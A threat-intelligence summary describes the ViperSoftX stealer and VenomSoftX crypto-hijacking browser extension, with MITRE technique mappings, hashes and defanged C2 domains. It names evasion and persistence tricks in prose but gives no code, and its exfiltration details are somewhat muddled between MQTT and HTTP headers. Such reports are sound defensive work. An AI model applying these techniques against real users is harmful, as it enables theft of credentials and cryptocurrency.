Threat Research

ViperSoftX: Hiding in System Logs and Spreading VenomSoftX – Avast Threat Labs

Securonix

ViperSoftX is a long-running information stealer that hides inside large system log files and uses multi-stage PowerShell payloads to drop VenomSoftX, a browser extension that performs man-in-the-browser attacks to steal cryptocurrency. The campaign spreads mainly through cracked software and torrents, uses MQTT-based C2, and targets cryptocurrency wallets across several exchanges, with India, the USA, and Italy being heavily affected. #ViperSoftX #VenomSoftX

Keypoints

  • ViperSoftX hides a malicious PowerShell payload inside oversized log files and uses two variants: a simple dropper and a standalone PowerShell script with decryption routines.
  • The malware extracts data via AES-CBC decryption with a hardcoded key/IV, then deserializes a protocol buffer to reveal five files (including a PowerShell stealer and a ViperSoftX payload).
  • Synchronization for persistence uses a legacy SyncAppvPublishingServer.vbs script to create a scheduled task.
  • VenomSoftX is a Chromium-based browser extension loaded by an installer; it hijacks crypto transactions by tampering with API calls to major exchanges and monitoring clipboard content.
  • The attacker’s extension can load into multiple browsers and disguises itself as legitimate extensions to evade detection.
  • The campaign collects fingerprints, clipboard data, and browser/OS information, then exfiltrates data via MQTT to a C2 server (e.g., broker.emqx.io) using HTTP headers for exfiltration signals.
  • Global impact includes tens of thousands of victims since 2022, with notable concentrations in India, the USA, and Italy; the actors target five major crypto exchanges (Blockchain.com, Binance, Coinbase, Gate.io, Kucoin).

MITRE Techniques

  • [T1059.001] PowerShell – The hidden log variants rely on PowerShell to decrypt and execute payloads, including a PowerShell script without encoding in one variant. “The second variant is in the form of a PowerShell script without the encoding…”
  • [T1027] Obfuscated/Compressed Files and Information – The loader decrypts data from itself and a blob is decrypted with a hardcoded key/IV; the data is stored at the end of the binary and decrypted for use. “This blob can be decrypted straight away using a hardcoded key as well as IV inside the binary.”
  • [T1053.005] Scheduled Task – The malware uses SyncAppvPublishingServer.vbs to create a scheduled task for persistence and to execute hidden scripts. “The malware creates a scheduled task using the legacy SyncAppvPublishingServer.vbs script for executing these hidden scripts afterward as well for ensuring persistence.”
  • [T1115] Clipboard Data – ViperSoftX monitors clipboard content for cryptocurrency wallet addresses and performs clipboard swapping. “monitors the clipboard for cryptocurrency wallet addresses to perform clipboard swapping.”
  • [T1555.003] Credentials from Web Browsers – The extension steals credentials and clipboard content via VenomSoftX’s browser integration. “steals credentials and clipboard content.”
  • [T1036] Masquerading – VenomSoftX disguises itself as popular browser extensions to avoid user detection. “The extension disguises itself as various popular browser extensions to avoid user detection.”
  • [T1041] Exfiltration Over C2 Channel – The gathered data is sent to the C2 server (via MQTT) with base64 encoding in headers. “The gathered data, as well as the fingerprint, is then concatenated together into a single string, encoded by base64, and sent to the hardcoded C&C server in the User-Agent HTTP header.”
  • [T1564.001] Hide Artifacts – The malicious line is embedded inside large log files and hidden among innocuous content. “concealed as small PowerShell scripts on a single line in the middle of otherwise innocent-looking large log files, among others.”

Indicators of Compromise

  • [SHA256] context – hashes of dropped components and payloads (example: Activator.exe, Hidden log script variants, and ViperSoftX PowerShell). e1dc058fc8282acb95648c1ee6b0bc36b0d6b5e6853d4f602df5549e67d6d11a, 0bad2617ddb7586637ad81aaa32912b78497daf1f69eb9eb7385917b2c8701c2, 0cb5c69e8e85f44725105432de551090b28530be8948cc730e4b0d901748ff6f
  • [SHA256] – and 2 more hashes for other payloads (e.g., ViperSoftX PowerShell, VenomSoftX installer)
  • [Domain] context – command-and-control and update domains used by the malware (example: api.private-chatting[.]com, apps-analyser[.]com, wmail-blog[.]com, wmail-service[.]com)
  • [URL] context – specific endpoints referenced by the malware (example: http://apps-analyser[.]com/api/v1/, http://api.private-chatting[.]com/connect)
  • [File name] context – notable filenames observed in the campaign (example: Activator.exe, VenomSoftX browser installer, ViperSoftX PowerShell, content.bootstrap.js, manifest.json)
  • [File name] context – additional observed dropped artifacts (example: Hidden log script first variant, Hidden log script second variant)

Read more: https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/